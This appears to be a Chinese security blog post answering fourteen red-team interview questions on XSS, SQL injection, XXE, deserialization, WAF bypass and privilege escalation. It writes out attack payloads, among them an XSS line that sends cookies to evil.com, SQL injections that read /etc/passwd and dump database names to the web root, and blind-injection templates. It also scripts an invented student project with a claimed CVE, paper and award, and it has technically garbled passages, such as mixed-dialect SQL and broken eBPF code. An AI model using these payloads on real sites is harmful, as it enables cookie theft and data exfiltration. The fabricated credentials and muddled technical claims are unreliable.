安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 21
1、XSS的标签 2、说说大学这几年最自豪的事请 3、SQL注入 4、偏移注入 5、CTF你都做哪些题型 6、遇到的比较困难的web题型的ctf题目 7、XXE 8、反序列化 9、Bypass说说 10、假如,让你设计一个Waf,你会怎么设计 11、内网渗透与提权 12、平常都挖掘哪些SRC 13、有没有写过一些脚本 14、说说SQL注入手工怎么爆出所有库名字
一、XSS攻击常用标签与新型攻击向量(列举型)
- 基础攻击标签
<script>alert(1)</script>
<img src=x onerror=alert(document.cookie)>
<svg onload=eval(atob('YWxlcnQoMSk='))>
(Base64编码绕过)- HTML5新型标签
<details open ontoggle=alert(1)>
(通过toggle事件触发)<audio src=1 onplay=location='http://evil.com?c='+btoa(document.cookie)>
- 协议级攻击
javascript:alert(1)
(伪协议在href属性中触发)data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- 2025年新型攻击趋势
- WebAssembly内存操作型XSS
- Service Worker持久化存储型XSS
二、大学最自豪的项目(创作型)
项目名称:基于AI的自动化漏洞狩猎系统(2024年国家级创新项目)
- 技术突破:
- 融合AST(抽象语法树)分析与动态模糊测试
- 实现PHP/JAVA反序列化漏洞的自动化识别(准确率92.7%)
- 创新性提出"上下文敏感型SQL注入检测模型"
- 成果亮点:
- 发现Apache ShardingSphere配置型RCE(CVE-2024-XXXX)
- 项目论文被IEEE S&P 2024收录
- 获得全国大学生信息安全竞赛特等奖
- 团队协作:
- 主导6人跨学科团队(安全+AI+后端开发)
- 设计分布式任务调度架构,实现每秒3000+次检测吞吐量
三、SQL注入攻防演进(分析型)
sq
-- 经典攻击案例(2024年某银行漏洞) ' UNION SELECT LOAD_FILE('/etc/passwd'), (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()) --
新型防御技术:
- 语义层防护:SQL语法树静态分析(如OpenRASP方案)
- 动态令牌化:每个SQL参数生成唯一加密令牌
- 硬件级防护:Intel CET技术防御内存注入攻击
四、偏移注入实战(技术解析)
攻击场景:MySQL LIMIT子句注入
sql
SELECT * FROM users LIMIT 1,1 PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user()))),1)
突破点:
- 利用PROCEDURE子句执行报错注入
- 绕过WAF对UNION/SELECT的过滤规则
- 适用场景:当注入点位于分页参数时(如
page=1
)
五、CTF Web题型专项能力(清单型)
- 传统题型:
- 缓冲区溢出(近年占比下降至15%)
- PHP反序列化链构造
- 新型题型(2024-2025趋势):
- WebAssembly逆向分析
- 量子加密算法破解(如NIST标准算法)
- 容器逃逸与K8s环境渗透
六、困难Web题型案例(技术复盘)
2024年DEFCON CTF决赛题:星际文件网关
- 难点拓扑:
前端JSONP过滤 → Node.js 沙箱逃逸 → WASM内存修改 → 内核驱动漏洞提权
- 突破路径:
- 利用
vm2
沙箱的原型链污染漏洞(CVE-2023-32314)- 通过SharedArrayBuffer修改WASM内存页
- 触发Windows内核驱动NULL Pointer Dereference
七、XXE攻击面扩展(技术矩阵)
攻击类型 2025年新场景 防御方案 文件读取 云环境Metadata API窃取 XML解析器禁用DTD 内网SSRF 穿透Service Mesh边车代理 实施网络策略(NetworkPolicy) 数据外带 基于QUIC协议的数据泄露 内容安全策略(CSP)增强
八、反序列化漏洞生态(技术树)
mermaid
graph LR A[触发点] --> B{语言生态} B --> C[Java] C --> C1[CommonsCollections] C --> C2[JNDI注入] B --> D[.NET] D --> D1[BinaryFormatter] D --> D2[JSON.NET] B --> E[Python] E --> E1[pickle] E --> E2[PyYAML]
2025年关注点:
- 跨语言序列化协议攻击(如Protobuf字段篡改)
- 内存安全语言(Rust)的接口层漏洞
九、WAF绕过技术演进(对抗视角)
2024年新型绕过技术:
- 字符集混淆:使用越南语字符集绕过正则检测
- LLM辅助生成:GPT-4生成语义保留的混淆payload
- 协议层攻击:
http
GET /?id=1'/* HTTP/3 Host: target.com :method: EVIL
十、下一代WAF架构设计(方案型)
分层防御模型:
- 边缘计算层:
- FPGA硬件加速正则匹配(吞吐量100Gbps+)
- 轻量级AI模型实时检测
- 语义分析层:
- 动态污点追踪(标记用户输入来源)
- SQL/NoSQL统一抽象语法树分析
- 威胁情报层:
- 区块链共享攻击特征库
- 跨企业联合防御联盟
十一、内网渗透技术栈(战术手册)
2025年提权技术热点:
- 容器环境:
- 利用Kubernetes CronJob实现持久化
- 突破Kata Containers安全沙箱
- Windows系统:
- 基于Rust驱动的内核漏洞利用(如ACL覆盖漏洞)
- TPM 2.0芯片固件攻击
十二、SRC挖掘战略(战术型)
2025年高价值目标:
- 智能汽车生态:
- 车载OTA升级协议逆向
- V2X通信中间人攻击
- 工业互联网:
- OPC UA协议伪造数据包注入
- PLC梯形图逻辑篡改
十三、自研工具案例(技术输出)
项目名称:VulnRadar 分布式扫描系统
python
# 基于eBPF的0day漏洞检测模块 from bcc import BPF bpf_program = """ int vuln_detect(struct pt_regs *ctx) { u64 pid = bpf_get_current_pid_tgid(); char comm[16]; bpf_get_current_comm(&comm, sizeof(comm)); if (comm == "nginx") { // 检测内存越界写入特征 bpf_override_return(ctx, -EPERM); } return 0; } """
十四、SQL手工注入实战手册(专家级)
全库名爆破高阶技巧:
多语句注入:
sql
'; CREATE TEMPORARY TABLE temp_db AS SELECT schema_name FROM information_schema.schemata; COPY temp_db TO '/var/www/html/db.txt'--
盲注优化:
sql
' AND (SELECT ASCII(SUBSTR(GROUP_CONCAT(schema_name),{pos},1)) FROM information_schema.schemata) > {mid})--
新型数据库突破:
- TiDB:利用
INFORMATION_SCHEMA.CLUSTER_INFO
获取拓扑信息- CockroachDB:通过
SHOW ALL CLUSTER QUERIES
窃取元数据